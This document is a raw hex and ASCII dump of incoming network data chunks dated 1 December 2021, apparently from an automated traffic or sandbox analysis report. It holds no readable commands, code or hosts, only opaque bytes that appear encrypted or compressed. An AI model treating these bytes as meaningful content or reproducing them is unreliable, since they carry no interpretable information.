28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af Data Ascii: 1`LDN9Gg)O-}Zv]+&+gvtt=0M'\gnEGN7XAp!"fF+:\|JKZtpuF+m_F=Lb{C!wqq"-p0474]&}TO!U<_G()Xbc
2021-12-01 18:25:38 UTC	112	IN	Data Raw: 85 3d 88 05 d6 93 3d ae cb 5a fe a9 e6 56 0a d6 f2 50 d7 58 18 8f 12 84 0e 4d 38 f9 33 57 e9 7a 8c bf 12 e2 26 8d 45 13 52 90 56 f6 e2 f2 e4 d1 e2 2f 17 dd 75 11 53 53 b4 bb 31 ea ae 1f 55 8b 59 08 86 c6 a8 e0 04 3b 5c 88 e8 fd 19 73 9e 44 f1 d5 7d b1 f4 b1 8f 90 fc d7 7e f5 ef 5e ba 11 54 c7 fd ee c1 0a 1a a6 a0 b3 7a 47 c5 e5 db 15 8b 75 13 da 96 f1 3f 28 c2 6d 5c 86 15 f4 93 b8 2c 51 14 8e 84 de 99 56 19 69 97 d9 d5 b5 ee d9 b2 ad 66 12 55 80 19 8f de 89 15 54 16 a7 bd d6 c9 c1 93 75 d2 1a d8 80 11 be ca 51 e1 50 f5 6e e9 79 4b 24 4a 4e 24 09 65 d2 79 77 9a a0 93 4a a1 ae 5b 9b fd e5 a8 24 db dd 28 1b 78 23 12 79 c1 82 44 d9 e4 8d 65 e5 22 b1 8a 5c f7 d3 1b 23 76 03 68 d1 2f 4a f8 0c f0 04 b5 d5 9c 5f dc 12 b8 22 20 03 c2 3b c8 18 c2 49 f3 61 58 fb 70 Data Ascii: ==ZVPXM83Wz&ERV/uSS1UY;\sD}~^TzGu?(m\,QVifUTuQPnyK$JN$eywJ[$(x#yDe"\#vh/J_" ;IaXp
2021-12-01 18:25:38 UTC	113	IN	Data Raw: 91 2f bb d7 00 58 6f cf 17 c0 2c 29 8a ff 31 34 69 b7 e4 73 ec 02 f3 6f ab a9 d6 3b 2d 4e 2c 96 3d f2 38 f2 3f 3f cd 05 eb c3 d0 5c 76 42 39 e5 16 b1 04 6b bc 17 e2 0a 71 45 6c 77 de 73 69 8b e6 55 27 17 ee 03 e8 e8 d0 f0 f5 7d f2 ce 16 e8 0e eb a3 a1 ea b8 55 11 c1 8e 7c 02 0a ca 18 be 86 0d 63 a7 e4 0f 5b 0f 37 cf 98 ac 0c 7c d8 2e 7d d6 54 b7 41 e7 25 a5 43 7c 2b 14 40 a4 19 69 6d 96 bf 28 f7 8d 8b e8 3b 2f 24 20 af f8 0c 06 7a af f0 bf 5c 5c 90 3a 2f 4e 92 8c f8 6f 47 74 72 29 69 a7 23 e8 b7 a4 81 66 38 67 80 ef 55 75 60 94 3c 0f 9f 73 63 ef 51 29 b3 f7 fc ae 15 17 5d 5e 79 53 64 3c 88 46 23 80 85 06 98 56 e5 f9 8f dc ad b3 14 72 f1 3a f2 0c 68 a0 1e a2 d7 8e ec 92 8e 90 91 cc c9 e8 e2 58 b9 5f 19 8b 57 c5 a0 f0 de 3f 88 6e 2a 13 38 da 8f 7b 9d 21 a6 Data Ascii: /Xo,)14iso;-N,=8??\vB9kqElwsiU'}U\|c[7\|.}TA%C\|+@im(;/$ z\\:/NoGtr)i#f8gUu`<scQ)]^ySd<F#Vr:hX_W?n*8{!
2021-12-01 18:25:38 UTC	114	IN	Data Raw: aa d9 ed f5 48 2c db 5a 5a 2e 0d 3d c1 08 21 86 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 90 05 25 a3 c7 4c da 60 2f 77 7c 8b 63 28 85 6e 6c 10 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 d7 2f 6a 77 6c af fc dd 1a 52 37 24 b1 9b b9 5a c3 d9 ab a0 3d f2 a4 75 a9 af ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 d8 60 4b e3 ee 5e 5a b9 93 21 75 31 1e 86 33 d0 31 71 22 20 a0 27 34 52 4a 14 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 06 1d ad 97 59 14 2f b3 a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 Data Ascii: H,ZZ.=!i_`Z%L`/w\|c(nlh+O)h/jwlR7$Z=u7cC0gn`K^Z!u131q" '4RJn8z??0Y/2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_G(
2021-12-01 18:25:38 UTC	115	IN	Data Raw: d6 1b 34 19 79 71 b9 24 c9 4d a2 da d3 3b 4c 46 a6 58 28 0f cd f4 e6 39 71 37 44 a2 6c 8e 45 ea 86 82 2a d6 f2 d9 93 94 2d c7 99 00 62 24 cc a7 f0 57 eb c2 ec 1e 12 4b 2e 20 25 f4 ce 71 5a a5 b7 2d f7 b4 d6 eb 82 93 ab 28 07 1b 37 1b 2a fd ea ef 55 c3 d2 a0 bc 70 f9 c9 84 19 d4 72 db 6e 4b d9 8a 44 f1 0c 34 46 f6 85 cc b8 c6 30 6a a3 ec 5e 03 0c c3 62 50 2d 97 0e ba 70 47 bf 1e 46 c5 5c 8a 7f d3 fe d0 9e 8e 04 ba d3 3d 2c 6e fb ec 21 83 d4 25 15 30 be 20 39 6d be b3 2e 5b 26 0a 90 a7 36 7f cd 6a 26 96 ed a5 f1 a2 c1 98 50 51 b2 7e 8f 30 1d db 76 63 10 a3 f4 24 f6 47 18 74 6f 35 87 f7 af 07 0f 35 ba ad bf 61 8e 08 bd 92 ef 3c 33 1b a7 2e 8b b5 5e ee 1b 60 52 ce 68 26 df 15 76 76 cd bb 9f 5c 19 15 ed ae e1 ce eb 6f b9 33 67 fd 46 fb dd 7a 05 b0 08 75 c2 76 Data Ascii: 4yq$M;LFX(9q7DlE-b$WK. %qZ-(7UprnKD4F0j^bP-pGF\=,n!%0 9m.[&6j&PQ~0vc$Gto55a<3.^`Rh&vv\o3gFzuv
2021-12-01 18:25:38 UTC	116	IN	Data Raw: 5a c2 98 aa a1 3c f1 a5 74 a9 b4 ef cc 36 62 42 31 8d eb 66 1b 6f 8a 9b 84 99 61 4a a2 c1 2d 28 ca f1 21 75 fd 32 4b ff 1c fd ed ee ec 6c e9 f8 9e 86 40 5d ea 4a 30 32 b6 53 e9 90 66 e0 45 42 b5 c5 f1 9d 9f d2 50 0b cb e9 b9 be bc 1e 5c 72 be b9 ae 77 65 54 88 bd a9 36 13 a0 5e d9 55 0c 18 5b ea 7e ae 1c a0 71 e6 cc 64 db b9 67 72 f2 36 87 95 aa f8 bd 95 e6 60 f1 aa 46 34 37 5a eb 4e 64 a1 25 31 c9 11 84 d2 25 69 75 6d 72 6d 5c 40 9f a3 21 92 55 98 6a 45 82 a0 e4 66 01 5f df af eb 62 3e f3 ca ec 01 39 28 9d c5 88 8c d0 c0 84 12 13 05 29 d6 96 10 ef 27 d1 e0 b1 50 34 57 89 69 9e 45 01 90 84 85 cb b3 24 03 fa a0 71 bf b7 e5 33 ea 7b 8f 26 d8 38 25 8b 0e a8 34 d4 41 5b 91 05 89 94 92 ab eb 87 b1 c1 f3 79 dc 2d 18 1e 92 28 71 65 d6 12 f0 6e d9 1d ee e2 58 bd Data Ascii: Z<t6bB1foaJ-(!u2Kl@]J02SfEBP\rweT6^U[~qdgr6`F47ZNd%1%iumrm\@!UjEf_b>9()'P4WiE$q3{&8%4A[y-(qenX
2021-12-01 18:25:38 UTC	118	IN	Data Raw: 1e 2a 3e dd c6 03 37 5a 67 a6 d3 0e 28 d2 cf 3a 24 bd 43 45 db c3 1b 58 b2 a9 e8 a3 d7 06 e9 e2 94 18 4e 7b b2 c1 79 00 b6 6b 9b c6 5c cb bc 8a 79 a4 44 c5 1b 44 2c 78 74 e5 29 a4 e9 bf f0 b5 15 30 8d a5 fa 16 8e 5d 5d ee fe b4 35 cf 52 f6 89 06 d3 cb a2 0b 2a 25 c1 9e d7 3d 53 84 d2 50 11 db 3a a2 db fe 9c dd bb 8f 37 e6 63 dd 6f 3f 82 b4 6c 7f 3f 03 0a 65 b4 08 bb 51 2a 68 53 1d af 5b d3 76 fd 08 63 ab 21 cf 50 dd 64 14 45 b6 85 d3 59 4f 9d 9e ac 2e 09 6a 5c f9 68 07 e4 07 c2 55 cd cd 01 fe 85 70 73 3e 2d e8 15 1c 55 5d e1 61 bb 09 0b db d9 bd ae 9b 5d d6 dc 2d d1 db ce 4b a8 52 a4 41 18 64 18 46 18 1c 09 55 9d e2 b3 ec c0 77 d8 cb 76 a1 af a6 f6 fb f7 b3 ce de 5f 95 4f 13 9f 44 c9 e8 ef 06 9a 7b f4 61 e6 d8 54 75 75 69 48 0f fe 9d f1 d8 2e 49 d4 da aa Data Ascii: >7Zg(:$CEXN{yk\yDD,xt)0]]5R%=SP:7co?l?eQ*hS[vc!PdEYO.j\hUps>-U]a]-KRAdFUwv_OD{aTuuiH.I
2021-12-01 18:25:38 UTC	119	IN	Data Raw: 75 d4 b9 c5 d0 87 29 1a fd 75 44 b3 b2 15 1b cc 0b a0 5f cb 23 f5 2c 23 41 48 77 ed 87 95 da be 3e aa 66 6e 75 7b 68 46 53 b8 e1 27 64 ae 51 d7 c9 11 04 9b ae 26 53 79 95 35 64 2e 3e 60 5b e8 31 9c 8e 3c 80 cf 9b c0 af 5f 6f af 8d e1 69 8f cf 82 f0 fb 28 9d e5 ca 0f a9 ee e0 1d 96 b3 40 b2 f7 2c 03 47 c7 80 82 af 71 2c 64 e0 e2 79 61 d5 b7 6b ea 5e 01 53 bb 09 11 be ff 6e fe 75 4a 9e 31 b0 38 18 a8 20 c1 90 c0 5a b1 f1 15 e9 d0 1f e0 21 a0 72 f2 de f2 0c 6c 8e 77 c6 49 05 8d b6 00 90 91 cc c9 e8 d2 58 f9 67 19 8b 57 eb c2 83 ad 3f 88 6e 2a 13 78 da 8f 17 9d 21 a6 96 ab 3e 4c 96 15 06 14 15 2f 66 ca 0b c9 18 37 be 44 ae bf 9c 2a 4a 33 31 c1 89 1c 2d 92 f6 ed 36 25 8a 43 cc 9a 83 24 90 0d 70 5a 1a cf 0c 3b e5 0e 42 65 41 89 6c 6c c7 28 f7 10 68 77 9e 57 e4 Data Ascii: u)uD_#,#AHw>fnu{hFS'dQ&Sy5d.>`[1<_oi(@,Gq,dyak^SnuJ18 Z!rlwIXgW?nx!>L/f7DJ31-6%C$pZ;BeAll(hwW
2021-12-01 18:25:38 UTC	120	IN	Data Raw: f1 d5 da 89 15 1c 75 da 81 9a 42 11 db 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7e 02 0a 39 f3 40 14 1b 44 49 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2a f6 d2 c2 03 62 f4 80 fe 32 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4b 79 78 94 45 cb 33 69 ec 1a 10 50 3e 8f 74 65 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 31 04 b9 65 4d b2 a9 61 f3 ab 00 30 af fa 47 d9 ee b7 7d 87 b5 6b 46 8c 8d 41 d5 73 73 50 29 df 1d 05 bd 49 4c Data Ascii: uBv/T%c5}K$e@0}[,SdvvPo]`z?g u]y$8Pn#8KSA, Q. mcj:7;~9@DIqQ@Q9b2("ni)yKyxE3iP>te!AH,zZ.1eMa0G}kFAssP)IL
2021-12-01 18:25:38 UTC	122	IN	Data Raw: 65 cf 9a 09 cf 45 18 1e e3 96 a8 37 69 57 62 63 f4 ac b3 44 56 02 7b a4 c6 45 14 c4 36 a4 7c 35 60 27 51 e8 e3 56 ef 08 ff 11 5f 75 3e be 03 da dd 04 29 15 5e 21 d0 d5 47 e8 fc 2e e3 33 01 8d 87 8b 79 50 48 b8 95 f6 0c 2d 67 de 12 84 92 dd 40 bc c6 04 74 15 1d 00 56 4c ec d4 ca ba 48 61 af 64 c7 25 70 f0 e1 05 b6 b7 6c 1d 2b ed c3 49 00 90 bf 69 4e dc c9 18 37 1b 42 f9 91 72 61 46 01 d8 89 0a 61 a1 c2 7f a9 92 00 85 c5 76 e8 f0 56 78 64 40 5b c8 8d 87 fa 24 e6 5f 46 83 02 bd ad 2d 36 74 f2 69 b6 77 48 61 11 c3 ca 40 bc 79 04 36 5a 6a eb e1 52 14 48 52 2d df 95 eb df 0b 58 35 82 48 cf 16 c1 b8 27 f5 d9 cf ce 66 d9 b4 2a d6 6d e8 56 fc 71 50 d1 bb ab 9e f7 73 2c d3 07 69 5d 0a a7 94 30 a6 5d 1d 8d 63 81 ee c1 2b 52 f9 67 d6 79 96 da b0 1f 8f 12 05 a7 c4 cc Data Ascii: eE7iWbcDV{E6\|5`'QV_u>)^!G.3yPH-g@tVLHad%pl+IiN7BraFavVxd@[$_F-6tiwHa@y6ZjRHR-X5H'f*mVqPs,i]0]c+Rgy
2021-12-01 18:25:38 UTC	123	IN	Data Raw: d2 47 5d 95 11 7b c9 24 88 d6 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 50 53 a4 03 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 77 7c 8b 5b 28 85 6e 6c 20 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 21 75 31 fe 87 33 d0 31 21 22 20 a0 25 Data Ascii: G]{$8Pn#8KPS, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Nw\|[(nl h+O)h/jBn37$Z=u7cC0gn`K,)!u131!" %
2021-12-01 18:25:38 UTC	124	IN	Data Raw: 5f 92 cf 73 d1 2b 26 55 72 94 e7 6e 37 1c 32 f6 85 62 de c0 31 9f 7e 0d 6f 30 22 34 7f 7e 36 47 2f ed 38 67 6f 23 f9 ed ff 1e f1 56 15 dd ba d5 cc 28 ca cd b6 34 ec 4c fd ac f0 56 79 ad 4a 54 3a cf 1c 01 64 32 62 65 51 fc 61 2d 44 d1 f3 6c 83 c9 9f 57 e4 d1 5d d0 f6 98 81 47 78 4a 64 7e 37 3c e7 2d d3 15 4a 68 91 9d 17 73 7d 2d fd b8 18 f6 90 f2 5c 10 37 95 f3 c6 40 3f 60 40 14 21 5d a8 a7 32 20 24 19 0b 73 c7 c2 8d 16 ab 8f d8 b4 7e b2 71 f2 b5 f3 48 a6 45 50 2b 0e 0e c6 fd e6 54 04 08 8f 02 7b 62 41 64 b2 f0 0f e9 f8 f4 dd 59 49 2c 0c 80 cb d4 44 8c a5 b7 a4 38 c5 92 e5 8c 74 16 ad fb e4 be 13 6d 4d fd de 5a 75 51 09 2a 8a cf 39 27 fa 0b 67 db 36 7a 99 a6 af f2 e7 7a 4e 9c c8 4e 5f 30 1b 8f 78 a3 7a 27 19 7d d0 3c 86 18 b1 2b a2 68 3b 6e cc 91 78 d7 c7 Data Ascii: _s+&Urn72b1~o0"4~6G/8go#V(4LVyJT:d2beQa-DlW]GxJd~7<-Jhs}-\7@?`@!]2 $s~qHEP+T{bAdYI,D8tmMZuQ*9'g6zzNN_0xz'}<+h;nx
2021-12-01 18:25:38 UTC	125	IN	Data Raw: 95 9f 82 cf 82 28 32 6e ef 03 d4 a2 71 13 4a f0 3c 6c ba de 6f 49 ec 0a fb 4d c2 2c 19 54 bb 8d 5e 6e 80 62 ec ab f3 dd c8 cd 44 1c db 6a e2 5e 1f 3b d1 cf 64 7e 36 04 81 d8 42 9e 07 82 90 e8 43 6f 5f 2e 95 e8 a8 a6 1d 78 d1 54 24 7d 2d 74 4e 24 a5 6e 7c ab 96 02 22 df 84 1c 2a b6 12 a7 bf 1c 4e 2d 5f c9 57 f7 97 dc 5e 8b 92 7e 95 a2 4e ff 98 ac e5 76 cb a9 90 77 92 9d 4a ae 28 48 38 78 fb 71 20 f0 03 46 36 ea 04 35 83 5c 26 1e 04 8b f0 85 10 27 42 5c d5 3c 09 cb e0 71 8a 24 fa a7 33 c0 59 29 03 20 b0 da 41 aa b5 1d dc 96 6e 28 10 7f 57 cd 90 30 b7 6e 0d 76 8e 77 ad 5e 14 e8 d0 a6 b4 12 4f e4 1c 55 aa 35 f8 15 af fe d7 e9 21 08 bd e9 29 97 85 6c 82 d6 42 15 e0 fd b3 70 67 a2 57 1e 01 46 4e bc f4 05 82 1c 97 9a 0e aa f6 e6 30 96 cb 71 c3 89 ff 06 0e a4 f0 Data Ascii: (2nqJ<loIM,T^nbDj^;d~6BCo_.xT$}-tN$n\|"*N-_W^~NvwJ(H8xq F65\&'B\<q$3Y) An(W0nvw^OU5!)lBpgWFN0q
2021-12-01 18:25:38 UTC	127	IN	Data Raw: ab cc b6 a7 09 0c 03 5c 16 16 81 e0 91 11 22 56 5d dc f3 0f 62 32 73 43 72 a3 e3 93 7f ef 30 70 04 ba ca 0c e7 36 5b 32 cb fc 79 4a b8 24 c9 05 ab bc f7 73 f7 c2 82 a0 06 66 a9 d5 1a 2c 71 43 cd e6 48 b6 7e 4c a2 72 fe d6 f2 50 f9 d9 79 ee 66 e5 62 f2 cc a7 f0 1f 62 8e c8 36 46 c2 6a 04 2b 69 a8 b3 46 a5 b7 a4 b3 d0 b6 6e 22 9c 23 50 2a 69 44 25 2a 4d fe 26 55 c3 d2 e1 5f ca df c6 83 7e d7 72 f5 54 82 a5 f9 60 c1 5e 34 46 f6 c9 67 39 14 3f e9 f1 ef 5e 03 49 f0 94 fc 84 48 4e 1a a6 48 3b fe 65 c5 5c cb f4 01 b6 5b 51 66 19 32 0f c2 6d e5 09 a4 a8 07 f0 a5 15 30 be 6c b2 9d 56 19 d0 a4 d9 4b 20 a6 50 f6 89 6a 7d de 60 af f6 da 89 59 3f 75 da 6f b8 42 11 db 55 2f 9b f3 f3 54 be e6 06 e6 63 09 a4 c4 7d 4b 24 f2 2a 66 2b 65 b4 f0 12 9e d5 7d 0b 1f af 83 98 af Data Ascii: \"V]b2sCr0p6[2yJ$sf,qCH~LrPyfbb6Fj+iFn"#PiD%M&U_~rT`^4Fg9?^IHNH;e\[Qf2m0lVK Pj}`Y?uoBU/Tc}K$*f+e}
2021-12-01 18:25:38 UTC	128	IN	Data Raw: 48 e2 83 90 11 51 08 12 05 9d 07 76 78 36 d8 eb 76 9a a6 52 89 90 cb ad 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 21 75 31 fe 87 33 d0 31 21 22 20 a0 25 34 52 4a 08 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3a 60 27 da 2d 22 be ff 6e fe 15 6e 9e 31 d8 38 Data Ascii: HQvx6vR/jBn37$Z=u7cC0gn`K,)!u131!" %4RJn8z??0FY/2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_G()Xbcqd@aaE:`'-"nn18
2021-12-01 18:25:38 UTC	129	IN	Data Raw: a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 9e 6a e3 dd 97 47 ef 9f d7 72 db 15 31 9e 17 3f 79 d5 34 47 f6 c9 30 b1 97 c5 e8 fe 6a 42 02 49 f0 dd 91 fd 40 06 b3 c2 6c 6b 3f ce 96 7c f8 2f 40 0f 5a 50 66 19 0c a5 86 49 c5 6c 97 68 4f 7d b0 5e 20 be 6c fa 5a 97 18 d0 a4 59 c0 db 59 45 5a 86 4e 5e 5b a0 fe 50 52 89 15 1c 3d 51 cd be 12 59 56 f2 0b 63 e7 d0 54 f6 43 61 c2 4b 7d 0a d1 a6 44 24 f2 6f 91 c0 2d 3d 1c 14 be 90 4e cb e0 ba d1 94 fd a1 a9 93 96 e7 41 80 eb 9c 14 76 76 40 1b dd 90 d7 d3 6f e2 c5 ee 9f 36 a0 6f 2b 70 4f 04 da ff c1 b2 40 fe 35 88 5f 02 c2 9a 11 79 81 a9 0c e4 c0 09 50 f9 cf 88 ae 57 aa 7c e5 f1 86 c2 6c 77 84 be 0d 68 94 82 20 5a 05 ed 58 66 f4 ef f3 ae 73 08 ba 6d 2b Data Ascii: b6ZjFnB#P7WIiUjGr1?y4G0jBI@lk?\|/@ZPfIlhO}^ lZYYEZN^[PR=QYVcTCaK}D$o-=NAvv@o6o+pO@5_yPW\|lwh ZXfsm+
2021-12-01 18:25:38 UTC	130	IN	Data Raw: cf 78 3b 97 0e 2d 65 2d 89 4c 6c 97 28 96 10 06 77 fb 57 88 d1 ea d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 fc 10 c1 2c a3 e3 93 13 c0 30 70 10 46 ca 0c c9 a3 1f 53 bf 61 5b 79 b8 63 8a 51 67 9e e7 73 c7 84 83 a0 28 21 b9 d1 16 39 71 1a a3 e6 48 b6 ce 6e 82 72 2a 86 f2 50 d7 9e 74 eb 73 f0 27 e0 f9 a7 f0 1f 62 ee e8 36 5a 6e 6a 04 05 25 a9 a4 27 d1 d6 a4 b3 6c 96 6e 42 60 23 50 04 35 45 33 28 1d af 33 2f b9 a8 85 5d ed df c6 03 87 f6 72 db 1e f1 d7 9a 6a 89 08 55 32 97 c9 c3 2b 36 3f e9 6d cd 5e 03 67 95 f0 79 d2 29 4e 3e 4a 0c 3b 7e 6f c5 5c cb da 68 d2 3a 25 07 3d 76 2c c2 6d e5 dd e0 a8 07 e4 a5 15 30 90 05 d6 fc 22 78 f4 97 d9 4b 20 a6 58 b3 89 4e 0e de 60 f1 fb b3 ed 74 68 14 fe b5 9a 42 11 db 2e 6a 9b e7 46 54 be ca 0b 8f 07 54 f3 a5 Data Ascii: x;-e-Ll(wWn\R4"Vsn,0pFSa[ycQgs(!9qHnr*Pts'b6Znj%'lnB`#P5E3(3/]rjU2+6?m^gy)N>J;~o\h:%=v,m0"xK XN`thB.jFTT
2021-12-01 18:25:38 UTC	131	IN	Data Raw: 87 98 88 d0 05 cc cc e9 28 ab 24 4e 77 49 bb 5b 28 df 5e 6c 20 58 ce a9 9a c2 a5 2b b9 6d d2 4f 94 e1 19 d2 8c b6 96 68 a9 9e d0 97 2f 35 86 42 df 12 8d 6e 33 8e 15 dd 9b 51 6b c3 99 ac 92 3d f0 94 47 a9 b5 bd ff 37 63 33 02 8c ea f8 28 6e 8b 24 b7 98 60 96 91 c0 2c d3 f9 f0 21 58 02 fe 87 57 e3 31 21 b1 13 a0 25 80 61 4a 08 35 85 6e 38 74 0b 3f cd bf 04 b7 04 64 c9 46 1d 3c e3 59 14 93 87 a0 32 aa c0 97 18 5c a3 f8 25 80 db 10 ac 83 d4 bd e9 56 2f fd 75 e4 a6 b2 15 a2 f9 0b a0 81 97 47 94 7d 74 65 7d 3b db 87 95 db a8 3e aa 72 59 75 7b fd 02 37 d9 7d 70 64 ae b4 c1 c9 11 c4 ad ae 26 18 3c f1 54 92 78 1a 1a 98 a5 55 fe 19 0b 80 cf f2 db af 5f 9d 97 8d e1 18 cf ab e3 16 a2 28 9d 00 d6 0f a9 36 d8 1d 96 86 10 d6 96 1a 5b 63 f5 e3 bb af 71 1a 79 e0 e2 d2 58 Data Ascii: ($NwI[(^l X+mOh/5Bn3Qk=G7c3(n$`,!XW1!%aJ5n8t?dF<Y2\%V/uG}te};>rYu{7}pd&<TxU_(6[cqyX
2021-12-01 18:25:38 UTC	132	IN	Data Raw: 87 2f d3 ce 39 ed 25 6b a6 82 15 af d9 69 8f 65 ed 28 a9 a1 c3 de 48 2d e9 89 46 2a 87 12 6d 71 0b ba b5 3e e2 d2 d0 f7 f5 c0 2d 23 ec 50 11 04 6c 5e 39 24 04 aa 39 34 b6 aa a6 5a fe 9b a3 75 3c b6 02 a8 67 f1 b6 ef 3c b6 09 40 02 93 bf 80 7a 64 4c be f1 98 37 6d 24 9d f0 36 c7 3d 36 79 e3 3c 7f 1b 31 86 3d bb 87 56 b6 3a 24 1e 5e 21 58 8c 18 88 6d c1 de 74 f0 d2 7c 5e d3 01 d6 b3 37 6c a8 e3 bc 3f 6e d3 3d b2 ec 38 2d de 01 84 ad 9d ec 61 4a 1a b6 f4 f7 27 11 ac 1f 41 f6 8a b4 7a df bf 5d a1 06 41 d1 ab 11 3e 49 97 2a c3 7c 1d fb 35 44 d3 b0 0e 78 7e c8 3e 9b 8a c8 42 3e 8e cc e4 75 ba 1c 5b 03 02 80 35 ee 1c a3 3a 05 e2 a4 d3 6c 29 e1 4b 31 92 af 55 bf 9b c1 c5 61 1b a0 ad b6 39 3c e0 69 2a ac 50 de af 54 7c 3d 9c 8a d1 01 66 60 57 af bf a7 2c 53 3b c5 Data Ascii: /9%kie(H-Fmq>-#Pl^9$94Zu<g<@zdL7m$6=6y<1=V:$^!Xmt\|^7l?n=8-aJ'Az]A>I\|5Dx~>B>u[5:l)K1Ua9<i*PT\|=f`W,S;
2021-12-01 18:25:38 UTC	134	IN	Data Raw: 18 c6 ae 48 6a a4 9d 4c 14 5f 9a d0 33 bd 52 48 71 45 ce 41 67 26 38 61 ba d1 2f 38 0d 56 51 a0 ed 54 99 69 77 94 15 78 c3 b3 0a 60 5d da ce 55 0e f4 fa 7b 3f c5 9d 4b cb bd 64 de a4 8f da be 29 6d 94 1b 29 fe d6 3b 06 af 62 f3 14 cc 23 c7 2c 30 0c 13 10 ba 87 f8 c9 f7 6d cf 92 2b 07 12 30 51 45 9d f4 32 05 ae d6 9f a7 7c e9 fe 80 4b 1e 62 a2 31 64 0b 68 73 57 f7 27 ba 88 48 e1 cf 86 80 c6 0c ba db d4 88 22 9b cf b3 f6 f5 4b 9d b2 87 61 c4 ab 84 33 fb fe 40 85 f3 2c 3b 0a 90 ec e6 ff 03 0b 23 e0 8f 08 05 bc f4 2a ed 54 05 44 ae 2d 55 d7 91 03 93 71 40 f3 58 bc 51 5b c7 60 c6 91 c2 5a d0 b8 48 8d b9 5b 89 9a e7 1d 9c 54 97 6f 18 a0 69 cb 46 1c 81 f6 18 fd f8 a8 a0 ac 8b 2b 9a 30 77 e5 32 a6 d4 f0 b3 56 ec 07 63 7d 79 be eb 39 e8 47 c0 dd a9 5a 5a 8b 1a 6b Data Ascii: HjL_3RHqEAg&8a/8VQTiwx`]U{?Kd)m);b#,0m+0QE2\|Kb1dhsW'H"Ka3@,;#*TD-Uq@XQ[`ZH[ToiF+0w2Vc}y9GZZk
2021-12-01 18:25:38 UTC	135	IN	Data Raw: 81 33 6e 2d de f9 71 c2 21 01 4b f2 05 5e 0d 34 a4 3b ae f4 6c df 3f 38 29 6c 30 63 b2 08 8b 29 d3 c1 69 9d c8 71 1e d3 05 d6 f4 19 6c a4 eb a9 2e 4e a6 3d 9f ed 27 11 ab 14 a1 a7 bf f9 74 6e 10 92 e4 fb 26 74 a9 76 58 f2 89 bd 39 da e4 48 8f 07 5c c8 b1 09 1b 56 97 5a c3 7b 00 fc 25 51 fa b0 0f 0b 72 c6 3f f2 b2 d4 58 01 86 db af 60 cf 13 7d 18 1b a0 34 b3 02 ab 39 09 ad b0 d2 46 1f f7 5a 13 fd ae 49 b6 97 8e c7 7c 26 a8 b4 84 78 31 e0 7c 1c c9 53 e1 ae 55 64 34 d7 e7 d2 0a 76 6c 4d b5 8a ab 3f 46 3c c8 34 75 49 9b ef 49 bb ac d6 24 5a 2c 48 63 c9 60 4a c9 0a 63 1d 53 59 56 12 66 3c 54 9a 24 65 54 31 